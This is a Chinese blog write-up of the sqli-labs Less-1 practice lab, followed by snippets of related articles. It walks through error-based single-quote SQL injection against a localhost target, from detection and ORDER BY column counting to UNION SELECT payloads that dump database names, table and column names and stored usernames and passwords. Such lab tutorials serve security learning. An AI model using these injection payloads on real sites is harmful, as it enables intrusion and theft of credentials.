【Less-1】单引号报错字符型注入

最新推荐文章于 2022-12-14 09:44:15 发布
最新推荐文章于 2022-12-14 09:44:15 发布
阅读量532 收藏
点赞数 2
分类专栏: SQL注入总结 文章标签: sql mysql 数据库 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44032232/article/details/109305888
版权

目录

前言

提示:这个题目是基于错误,单引号,字符型注入

1、测试是否存在注入点
http://localhost/sqli-labs/Less-1/?id=1'

在这里插入图片描述

http://localhost/sqli-labs/Less-1/?id=1' and 1=1 -- +

在这里插入图片描述

http://localhost/sqli-labs/Less-1/?id=1' and 1=2 -- +

在这里插入图片描述

证明我们后面输入的sql语句被带入到数据库进行查询了,说明存在sql注入

2、判断字段数
http://localhost/sqli-labs/Less-1/?id=1' order by 4 -- +

在这里插入图片描述

http://localhost/sqli-labs/Less-1/?id=1' order by 3 -- +

在这里插入图片描述

3、查看回显点
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3 -- +   // id=-1 查询为空 后面的查询才能显示出来

在这里插入图片描述

4、联合查询
1)查看当前用户和当前数据库名:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,user(),database() -- +

在这里插入图片描述

2)查看当前库所有表名:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security'),3 -- +

在这里插入图片描述

3)查看users表中的列名:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where TABLE_SCHEMA='security' and table_name='users') --+

在这里插入图片描述

4)查看用户名和密码:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(concat_ws("   ",username,password)) from security.users) --+

先将查询出来的用户名和密码以空格链接,这样在用group_concat连接后更容易分辨出用户名个密码。

在这里插入图片描述

多学点技术
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【合天网安】SQLi-Labs系列之字符报错注入单引号和括号)
hehigoxqc606的博客
09-01 348
1、击GET-Error based-Single quotes with twist – string,进入实验界面 在id值后面多加一个单引号,引发报错,根据提示信息,我们可以发现sql语句是使用了单引号和右括号闭合 2、可以在第二或第三字段中用version()函数代替,查看当前数据库的版本,得出版本为5.5.53。 http://localhost/sqli-labs-master/Less-1/?id=-1')+union+select+1,version(),3--+ .
sqli-labs从零开始学习日记(二)
sky_die的专栏
05-08 1834
嗯,这次有个很好用的东西SQLMAP,主要是我看的视频里面他们用的是其他的软件
单引号字符注入
热门推荐
Battery的博客
12-14 12万+
判断sql注入漏洞的类:1.数字、2.字符。用and 1=1 和and 1=2来判断。将1=1换成1=2发现没有报错,但不显示信息,说明可以使用字符注入。继续输入and 1=2,页面显示正常,说明不是数字注入漏洞。使用order by,从一开始逐渐增加,一直到报错时停止。通过此处便可以插入更多的sql语句去查询一些信息。id=1,得到用户名和密码。id=1’ and 1=1--+由此可以确认列数为3(因为到4报错)输入and 1=1来,没有变化。可以得到上一步骤账户的密码。
SQL注入】Less-1错误GET单引号字符注入
Mitchell_Donovan的博客
03-30 329
Less-1错误GET单引号字符注入 什么是单引号字符注入? 通过'的报错进行sql查询,并用mysql能输出字符的函数,获取我们想要的数据。 漏洞复现过程 在实验室浏览器打开Less-1 1、发现注入 输入?id=1 正常; 输入?id=1' 报错,就存在sql注入漏洞。 2、猜id=1显示条件中表的字段 例如输入?id=1' order by 3 --+ 显示正常 再次输入?id=1' order by 4 --+ 显示错误 所以的出,在?id=1查看的这个表有3个字段
单引号报错注入---sqli-labs靶场前瞻
yzl_007的博客
08-22 335
单引号报错注入sqli-labs靶场前瞻 第一关 输入?id=1后正常回显 测试注入: 构造一下payload:?id=1’or ‘1’='1 正常回显 ?id=1’ and ‘1’ = '2 无回显,由此判断此处存在sql注入漏洞,也可以用sqlmap跑一下如下: 测试指定url是否存在sql注入 sqlmap -u http://127.0.0.1/sqli-labs/Less-1/?id=1 前面测得具有回显,sqlmap也表示存在union联合查询 先查找列 ?id=1
第六节 GET报错注入-01
最新发布
09-15
在GET单引号报错注入中,攻击者通常会利用URL参数,如`id`,来构造恶意的SQL查询。以Sqli-Lab的Less-5为例,攻击者可以尝试获取表名、数据库名、用户信息等。通过在URL中添加特定的SQL语句,攻击者可以利用`union ...
less-plugin-clean-css:使用clean-css对CSS进行后期处理和压缩
02-23
npm install -g less-plugin-clean-css 然后在命令行上 lessc file.less --clean-css="--s1 --advanced --compatibility=ie8" 见的可用命令选项-唯一的区别是advanced和rebase ,我们默认为false,因为它并不总是...
less-plugin-autoprefix:添加了由 autoprefixer 对 less 进行后处理的能力
05-29
npm install -g less-plugin-autoprefix 然后在命令行上, lessc file.less --autoprefix="browsers" 浏览器是由逗号分隔的列表。 程序化用法 var LessPluginAutoPrefix = require ( 'less-plugin-autoprefix' )...
less-plugin-lists:更少的ListArray操作
05-13
少插件列表 用于列表/数组操作的插件。...npm install -g less-plugin-lists 与lessc使用 lessc --lists file.less 有关通过命令行Less编译器使用插件的更多详细信息,请参见Less文档中的相应部分。
Webpack中css-loader和less-loader的使用教程
12-03
本文将详细介绍如何在Webpack配置中使用`css-loader`和`less-loader`。 ### 一、css-loader `css-loader`的主要功能是解析CSS文件,使其能够在JavaScript中被导入。通过`require`或`import`语句,你可以将CSS文件...
sql注入-字符报错注入
菲曼巴的博客
11-24 3252
报错 看回显 暴字段 order by 3 union select 1,2,3 暴库 1,2,database() 暴表 group_concat(table_name) from information_schema.tables where table_schema =database() 或 group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+ 暴列 group_conca
SQL注入字符报错注入
studyphp123的博客
04-23 496
一、预备知识 1. SQL注入基础知识 2. SQL语句基础知识 二、实验目的 学习SQL注入字符注入。 三、实验工具 火狐浏览器(hackbar插件) 四、实验环境 1. Windows Server 2003 2. 网址www.any.com/sqli/Less-1/?id=1 五、实验步骤 第一步:访问 http://www.any.com/sqli/Less-1/?id=1 #...
sqli-labs通关-------11lesson-post(基于错误的POST单引号字符注入)
枯藤闲画云
07-05 430
Post 基于表单提交,类似于下图 Sql的注释:--【空格】单行注释 在url中用--+ # 单行注释 /**/ 多行注释 Post注入 个人觉得就是想法设法搞到密码登录或者想办法绕过密码 方法一: 我们先随便输入一个账号密码给账号加上反斜杠看看啥情况,发现有报错,so根据报错字段应该是被单引号隐起来的。...
less-1
shawdow_bug的博客
07-22 296
打开页面后,根据提示,要在URL后面添加参数id,输入:/?id=1 (1)输入:/?id=1 and 1=1,页面没有变化,"and 1=1"有可能被当作SQL语句的一部分执行,也有可能只是作为字符串’1 and 1=1’的一部分。可以在数据库中测试一下: "="右边的字符串会进行数据类的转换,转换成字符串开头的数字 1,如果不以数字开头,则转换成 0: (2)输入:/?id=1 and 1=2,页面仍然没有变化,说明1后面的子字符串确实作为字符串的一部分。 (3)输入:/?id=1’,页面出现
【合天网安】SQLi-Labs系列之字符报错注入
hehigoxqc606的博客
09-01 209
SQL注入介绍: SQLi,sql injection, 我们称之为sql注入。何为sql,英文:Structured Query Language,叫做结构化查询语言。常见的结构化数据库MySQL,MS SQL,Oracle以及Postgresql.Sql语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的时,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常...
Less5-GET-报错注入-单引号-字符
qq_41883052的博客
05-18 180
1.寻找注入 初始页面无id参数 添加?id参数页面没有回显数据而是提示错误信息 使用’测试页面报错,可能存在SQL注入 分析报错语句: '1'' LIMIT 0,1 除有错误 我们的输入' 猜测原语句可能为 SELECT * FROM table WHERE id = '1' LIMIT 0,1; 需要闭合' 继续测试 and '1' = '1页面正常错误提示 and '1' = '2 页面无回显 存在SQL注入漏洞 页面不回显数据只是提示错误信息属于SQL注入当中的报错注入 这时我们就
Sqli-Labs-Master】Less1-4
Oavinci的博客
06-06 508
phpstudy2016:链接:http://pan.baidu.com/s/1bpbEBCj 密码:fmr4 sqli-labs-master:链接:http://pan.baidu.com/s/1jH4WlMY 密码:11mj Less-1 ?id=1'报错 ?id=1'%23 返回正常 ?id=1' order by 3%23 返回正常 ?id=1' orde...
(手工)【sqli-labs5-6】GET方法、单双引号、报错注入:基本步骤、错误注入过程
05-28 930
报错注入+闭合】
07、注入篇--显错注入字符
WX公众号-小白学安全
04-05 297
文章目录原理利用防范靶场 原理 利用 防范 靶场
npm install less less-loader -D 安装less报错
05-09
如果你在安装 `less` 和 `less-loader` 时遇到了报错,可能是由于你的环境缺少依赖或者权限不足等原因导致的。 以下是一些可能的解决方案: 1. 确认你已经安装了 `node.js` 和 `npm`,并且版本都是最新的。 2. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

多学点技术

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值